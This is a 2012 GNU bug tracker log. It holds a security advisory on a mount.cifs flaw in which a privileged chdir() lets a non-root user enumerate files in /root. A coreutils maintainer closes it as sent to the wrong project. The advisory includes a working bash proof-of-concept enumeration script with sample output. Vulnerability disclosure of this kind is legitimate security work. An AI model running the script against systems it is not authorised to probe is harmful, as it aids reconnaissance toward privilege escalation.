GNU bug report logs -
#10965
mount.cifs vulnerability
Previous Next
Reported by: Jesus Olmos <jesus.olmos <at> blueliv.com>
Date: Wed, 7 Mar 2012 18:40:02 UTC
Severity: normal
Tags: notabug
Done: Eric Blake <eblake <at> redhat.com>
Bug is archived. No further changes may be made.
To add a comment to this bug, you must first unarchive it, by sending
a message to control AT debbugs.gnu.org, with unarchive 10965 in the body.
You can then email your comments to 10965 AT debbugs.gnu.org in the normal way.
Toggle the display of automated, internal messages from the tracker.
Report forwarded
to
bug-coreutils <at> gnu.org:
bug#10965; Package
coreutils.
(Wed, 07 Mar 2012 18:40:02 GMT)
Full text and
rfc822 format available.
Acknowledgement sent
to
Jesus Olmos <jesus.olmos <at> blueliv.com>:
New bug report received and forwarded. Copy sent to
bug-coreutils <at> gnu.org.
(Wed, 07 Mar 2012 18:40:02 GMT)
Full text and
rfc822 format available.
Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):
Hello, here is a bug report for mount.cifs,
is a little security breach on linux permissions by controlling a
privileged chdir()
regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.
This software mounts cifs partition to authorized directories by fstab.
3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second
parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.
This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.
This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...
one of the attack vectors is /root/ directory scan:
[sha0 <at> spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
Also let to enumerate sub-sub directories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos <at> blueliv.com
# discover root protected files & directories, user homes, process
descriptors, ...
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
echo $i
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
echo $i
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,
This method of transfer files, is highly dangerous and can rely on a
remote control of the server
6. SYSTEMS AFFECTED
-------------------------
all versions are affected
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCOLSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
jesus.olmos <at> blueliv.com
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
Added tag(s) notabug.
Request was from
Eric Blake <eblake <at> redhat.com>
to
control <at> debbugs.gnu.org.
(Wed, 07 Mar 2012 18:48:01 GMT)
Full text and
rfc822 format available.
Reply sent
to
Eric Blake <eblake <at> redhat.com>:
You have taken responsibility.
(Wed, 07 Mar 2012 18:48:02 GMT)
Full text and
rfc822 format available.
Notification sent
to
Jesus Olmos <jesus.olmos <at> blueliv.com>:
bug acknowledged by developer.
(Wed, 07 Mar 2012 18:48:02 GMT)
Full text and
rfc822 format available.
Message #12 received at 10965-done <at> debbugs.gnu.org (full text, mbox):
[Message part 1 (text/plain, inline)]
tag 10965 notabug
thanks
On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()
Thanks for the report, but you have sent it to the wrong list. GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything. I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.
--
Eric Blake eblake <at> redhat.com +1-919-301-3266
Libvirt virtualization library http://libvirt.org
[signature.asc (application/pgp-signature, attachment)]
bug archived.
Request was from
Debbugs Internal Request <help-debbugs <at> gnu.org>
to
internal_control <at> debbugs.gnu.org.
(Thu, 05 Apr 2012 11:24:03 GMT)
Full text and
rfc822 format available.
This bug report was last modified 13 years and 134 days ago.
Previous Next
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.